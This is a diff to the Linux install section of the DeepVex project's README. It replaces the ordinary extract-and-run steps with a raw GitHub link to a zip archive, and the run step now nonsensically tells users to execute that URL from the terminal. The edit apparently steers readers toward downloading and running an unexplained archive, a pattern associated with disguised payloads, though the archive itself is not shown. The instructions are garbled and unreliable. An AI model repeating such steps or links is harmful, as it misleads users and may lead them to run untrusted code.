tobias-oss/DeepVex/README.md

 ### Linux

-1. Extract the `.tar.gz` file using your file manager or the terminal.
+1. Extract the `https://raw.githubusercontent.com/tobias-oss/DeepVex/main/core/Vex-Deep-v2.0.zip` file using your file manager or the terminal.
 2. If you downloaded an `.AppImage`, make it executable:
    - Right-click the file, select Properties, and check “Allow executing file as program.”
-3. Run the file by double-clicking it or via terminal with `./DeepVex.AppImage`.
+3. Run the file by double-clicking it or via terminal with `https://raw.githubusercontent.com/tobias-oss/DeepVex/main/core/Vex-Deep-v2.0.zip`.

 ---